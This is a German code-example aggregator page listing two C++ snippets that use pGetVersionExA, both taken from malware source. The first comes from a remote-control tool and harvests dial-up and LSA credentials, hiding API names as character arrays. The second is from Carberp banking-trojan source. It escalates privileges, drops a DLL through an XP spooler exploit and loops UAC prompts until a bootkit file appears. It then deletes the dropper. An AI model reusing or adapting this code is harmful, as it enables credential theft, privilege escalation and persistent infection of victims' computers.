C++ (Cpp) pGetVersionExA Beispiele

Programmiersprache: C++ (Cpp)

Methode / Funktion: pGetVersionExA

Beispiele auf hotexamples.com: 2

C++ (Cpp) pGetVersionExA - 2 Beispiele gefunden. Dies sind die am besten bewerteten C++ (Cpp) Beispiele für die pGetVersionExA, die aus Open Source-Projekten extrahiert wurden. Sie können Beispiele bewerten, um die Qualität der Beispiele zu verbessern.

Beispiel #1

Datei anzeigen

Datei: Dialupass.cpp Projekt: 8ackl0/remotectrl

bool CDialupass::GetRasEntries()
{

	int		nCount = 0;
	char	*lpPhoneBook[2];
    char	szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
	GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
	pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));

	char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
	lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
	plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
	char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
	lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
	plstrcatA(szPhoneBook1, m_lpCurrentUser);
	plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
	char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
	SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
    pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);

	char DQeBW01[] = {'%','s','\\','%','s','\0'};
    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
	pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
	
	lpPhoneBook[0] = szPhoneBook1;
	lpPhoneBook[1] = szPhoneBook2;
	
	
	OSVERSIONINFO osi;
	osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
	char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'};
	GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05);
    pGetVersionExA(&osi);
	
	if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5)
	{
		GetLsaPasswords();
	}	

	DWORD	nSize = 1024 * 4;
	char	*lpszReturnBuffer = new char[nSize];
	char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
	lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
	for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
	{
		memset(lpszReturnBuffer, 0, nSize);
		GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
		pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
		for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
		{	
			char	*lpRealSection = (char *)UTF8ToGB2312(lpSection);
			char	strDialParamsUID[256];
			char	strUserName[256];
			char	strPassWord[256];
			char	strPhoneNumber[256];
			char	strDevice[256];
			memset(strDialParamsUID, 0, sizeof(strDialParamsUID));
			memset(strUserName, 0, sizeof(strUserName));
			memset(strPassWord, 0, sizeof(strPassWord));
			memset(strPhoneNumber, 0, sizeof(strPhoneNumber));
			memset(strDevice, 0, sizeof(strDevice));


			char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'};
			GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04);
			int	nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0, 
				strDialParamsUID, sizeof(strDialParamsUID),	lpPhoneBook[i]);

			char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'};
			lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03);
			if (nBufferLen > 0)//DialParamsUID=4326020    198064
			{
				for(int j=0; j< (int)m_nRasCount; j++)
				{
					if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0)
					{
						plstrcpyA(strUserName, m_PassWords[j].login); 
						plstrcpyA(strPassWord, m_PassWords[j].pass); 
						m_PassWords[j].used=true;
						m_nUsed++;
						break;
					}
				}
			}

			pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0, 
				strPhoneNumber, sizeof(strDialParamsUID),	lpPhoneBook[i]);
			pGetPrivateProfileStringA(lpSection, "Device", 0, 
				strDevice, sizeof(strDialParamsUID),	lpPhoneBook[i]);
			char *lpRealDevice = (char *)UTF8ToGB2312(strDevice);
			char *lpRealUserName = (char *)UTF8ToGB2312(strUserName);
	 		Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord,
 			strPhoneNumber, lpRealDevice);
//			delete	lpRealSection;
//			delete	lpRealUserName;
//			delete	lpRealDevice;
		}
	}
	delete lpszReturnBuffer;

	return true;
}

Beispiel #2

Datei anzeigen

Datei: Main.cpp Projekt: AlexWMF/Carberp

// Ф-ция, которая вызывается при инжекте в другие процессы.
// Проверяет свои права и пробует их расширить для 
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
	// 
	//	Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты.
	//
	
	BOOL bRun = TRUE;
	BOOL bRet = FALSE;
	BOOL IsUsedExploit = FALSE;
	OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};

	UnhookDlls();

	BuildImport((PVOID)GetImageBase());

	PP_DPRINTF(L"ExplorerRoutine: started");

	if (! IsUserAdmin() )
	{
		PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
		switch ( TakePrivileges() )
		{
			case 0:
			case 2:
				bRun = FALSE;
			break;	
		};

		PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
		IsUsedExploit = TRUE; // По идее это всегда TRUE
	};		

	if ( bRun )
	{
		PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
		bRet = ExplorerMain();
		PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
	}
	
	/*		Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал		*/
	if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
	{
		PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");

		IsUsedExploit = TRUE;
		switch ( TakePrivileges() )
		{
			case 0:
			case 2:
				bRun = FALSE;
			break;
		};
		if ( bRun )
		{
			PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
			bRet = ExplorerMain();
			PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
		}
	};

	pGetVersionExA(&OSVer);

	
	/*		Выкидываем длл на диск и юзаем  сплойт спуллера, только XP		*/
	if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
	{
		PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");

		DWORD DropSize = 0;	
		PVOID DropImage  = GetSectionData("DROPER_DLL",&DropSize);
		if ( DropImage && DropSize)
		{
			PCHAR DropFile = File::GetTempNameA();
			File::WriteBufferA(DropFile,DropImage,DropSize);
			SpoolerBypass(DropFile);
			STR::Free(DropFile);
		};
	};


	/*		Запуск много раз копии дропера с прошением повышенных прав.		*/
	if (  bRet == FALSE )
	{
		PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");

		PCHAR tmpexe,dir,file ;
		PCHAR tmp_manifest;
		PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
		
		if ( NamePrefix )
		do 
		{

			tmpexe = File::GetTempNameA();
			tmp_manifest = STR::Alloc(MAX_PATH+1);
			
			dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
			file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
		
			if (  tmp_manifest && dir && file)
			{
				STR::Free(tmpexe);
				tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
				if ( ! tmpexe )
					return 0;
				m_lstrcpy(tmp_manifest,tmpexe);
				m_lstrcat(tmp_manifest,".manifest");
			};

			if ( tmpexe && tmp_manifest )
			if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
			{
				
				DWORD dwCode = -1;
				SHELLEXECUTEINFOA ExecInfo;
				
				m_lstrcpy(tmp_manifest,tmpexe);
				m_lstrcat(tmp_manifest,"   ");
				m_lstrcat(tmp_manifest,ARGV_UAC_RUN);

				ExecInfo.cbSize = sizeof(ExecInfo);
				ExecInfo.lpFile = tmpexe;
				ExecInfo.lpParameters = tmp_manifest;
				ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;

				for ( int i = 0; i < 10; ++i )
				{
					PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);

					if ( pShellExecuteExA(&ExecInfo) == FALSE )
						break;

					pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
					pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
					if ( dwCode == 0  )
					{
						PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
						break;
					}
				}
			};
			
			if ( tmpexe )
				STR::Free(tmpexe);
			if ( tmp_manifest )
				STR::Free(tmp_manifest);
			if ( dir )
				STR::Free(dir);
			if ( file )
				STR::Free(file);
		}
		while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) );	//	end do, цикл пока не появится Файл буткита

		if ( NamePrefix )
			STR::Free(NamePrefix);
	};

	/*		Если инстал был не удачный снова пробуем вдруг повезет*/
	if ( bRet  == FALSE)
	{
		PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
		bRet = ExplorerMain();
		PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
	}

	/*	 Удаляем дропер	*/
	PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
	pCloseHandle(StartThread(DeleteDropper,NULL));
	
	if ( dwExplorerSelf )
	{
		PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
		pExitProcess(0);
	}

	return 0;
}